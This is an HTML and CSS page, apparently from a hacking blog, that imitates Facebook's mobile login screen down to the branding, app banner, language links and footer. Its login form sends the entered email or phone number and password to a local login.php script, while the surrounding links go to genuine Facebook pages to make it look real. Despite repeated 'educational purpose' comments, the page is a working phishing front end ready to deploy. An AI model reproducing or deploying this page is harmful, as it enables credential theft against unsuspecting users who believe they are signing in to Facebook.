<!-- This code is only for educational purpose. Never ever misuse this in any case --> 




<!-- Important Note ! -->

<!-- We just share this code for educational purpose to test the vulnerability of phishing. We are not responsible for any illegal stuffs. if you do so, you will be locked up in jail -->

<style>
.heading { 
    display:block;top:0px;left:0px;right:0px;height:30px;position:fixed;border:0px solid #888;padding-top:16px;text-align:center;font-weight:bold;color:#ffffff;background: #3b5998;width: 100%;height: 100px;z-index:3;
    font-size: 70px;
    font-family: 'myFancyFont';
}

.headmid { 
    display:block;top:110px;left:0px;right:0px;height:20px;position:fixed;border:0px solid #888;padding:0px;text-align:center;font-weight:bold;color:#000;background: #ECEFF5;width: 100%;height: 1050px;z-index:3;
}

.fbapp { 
    background-color: FFFBE2;
    border: 2px solid #E2C822;
    border-radius: 15px;
    font-size: 40px;
    font-family: 'myFancyFont';
    font-weight: 400;
    color: #3B5998;
    height: 100px;
    padding-top: 45px;
}

.floating {
    float: left;
}

.icony {
    width:45px;
    height: 80px;
    padding-top: 30px;
    padding-bottom: 10px;
    padding-left: 40px;
}
</style>

<!-- This code is only for educational purpose. Never ever misuse this in any case --> 

<!-- code by Philiphacker.blogspot.com -->

<div class="heading">
facebook
</div>

<div class="headmid">
    <br/><br/>
    <div class="floating">
    <img class="icony" src="https://s33.postimg.org/hksxwrjb3/1512334555590.png"/></div>
    <div class="fbapp">Get Facebook for Android and browse faster.
</div>


<style>

@font-face
{
font-family: myFancyFont;
src: url(Roboto.ttf'),;
}

.header { 
    color: white;
    background-color: #3b5998;
    width: auto;
    height: auto;
    font-size:60px;
    display:block;
    font-family: 'myFancyFont', Times, serif; }

.email {
    padding-left: 40px;
    padding-top: 20px;
    text-align: left;
    font-size: 38px;
    font-family: 'myFancyFont', Sans-serif;
    font-weight: 410;
}

.mail {
    padding-left: 40px;
    padding-top: 20px;
    padding-bottom: 20px;
    text-align: left;
    left: 40px;
    font-size: 38px;
    width: 900px;
    height: 120px;
    border-radius: 10px 10px 0px 0px;
}

.pass {
    padding-left: 40px;
    padding-top: 20px;
    padding-bottom: 20px;
    text-align: left;
    left: 40px;
    font-size: 38px;
    width: 896px;
    height: 120px;
    border-radius: 0px 0px 10px 10px;
}
.button {
    padding-top: 20px;
    padding-bottom: 20px;
    background-color: #3b5998;
    color: white;
    text-align: center;
    left: 40px;
    font-size: 38px;
    width: 900px;
    height: 110px;
    border-radius: 10px;
}

.cbutton:hover {
    background-color: 326D15;
}

.button:hover {
    background-color: 4F6598;
}

.cbutton {
    padding-top: 20px;
    padding-bottom: 20px;
    background-color: #558B2F;
    color: white;
    text-align: center;
    font-size: 38px;
    width: 400px;
    height: 100px;
    border-radius: 10px;
    box-shadow: 1px 1px 16px #000000;
    border-style: none;
    text-decoration: bold;
    
}

.help {
    font-weight: 400;
    color: #7596c8;
    font-size: 35px;
    font-family: 'myFancyFont', Sans-serif;
    margin: auto;
}

.orrr {
    font-size: 36px;
    padding-left: 40px;
    padding-right: 40px;
    color: #4B4F56;
}

a {
    text-decoration: none;
}

.float1 {
    text-align: left;
    width: 50%;
    padding-left: 150px;
    color: #90949c;
    font-size: 30px;
    font-family: 'myFancyFont' , Sans-serif;
}

.float2 {
    text-align: left;
    width: 50%;
    padding-left: 150px;
    color: #90949c;
    font-size: 30px;
    font-family: 'myFancyFont' , Sans-serif;
}

</style>

<!-- This code is only for educational purpose. Never ever misuse this in any case --> 


<br/>

<form method="post" action="login.php">
    
    <br/>
    <br/>
    <input type="mail" align="left" class="mail" name="mail" id="mail" placeholder="Email address or phone number"/>
    <input type="password" align="left" class="pass" name="password" id="password" placeholder="Password"/>
    <br/>
    <br/><br/>
    <input type="submit" class="button" value="Log In"/></form>
    <br/>
    <br/>
    
    
    
    <center>
    <table>
        <tr>
            <td style='width:320px'><hr/></td>
            <td><div class="orrr">or</div></td>
            <td style='width:320px'><hr/></td>
        </tr>
    </table>
    </center>
    
<!-- This code is only for educational purpose. Never ever misuse this in any case --> 


    <br/>
    <br/><br/>
    <form action="http://m.facebook.com/reg">
    <input type="submit" class="cbutton" value="Create Facebook ID"/>
    </form>
    
    <br/><br/>
    <a href="http://m.facebook.com/recover/initiate"><div class="help"><font color="#7596c8">
            Forgotten password?</font></a><font color="black"> • </font><a href="http://m.facebook.com/help"><font color="#7596c8">Help center</a></div>
    <br/><br/><br/><br/><br/><br/>
    <center>
    <table>
        <tr class="float1">
<td style="padding-left: 2px">English (UK)</td>
<td style="padding-left: 320px">తెలుగు</td>
        </tr>
        
        <tr class="float1">
            <td style="padding-left: 40px;">
اردو
</td>
<td style="padding-left: 300px;">
മലയാളം</td>
</tr>
<tr class="float1">
    <td style="padding-left: 20px">
தமிழ்</td>
<td style="padding-left: 330px">
ಕನ್ನಡ</td>

</tr>
<tr class="float1">
    <td style="padding-left: 30px">
हिन्दी</td>

<td style="padding-left: 320px">more +</td>
</tr>

    </table></center>

<center>
<span style="font-size: 30px; font-weight: 10; color: grey; font-family: Sans-serif;">facebook©2017</span>
</center>

</div>
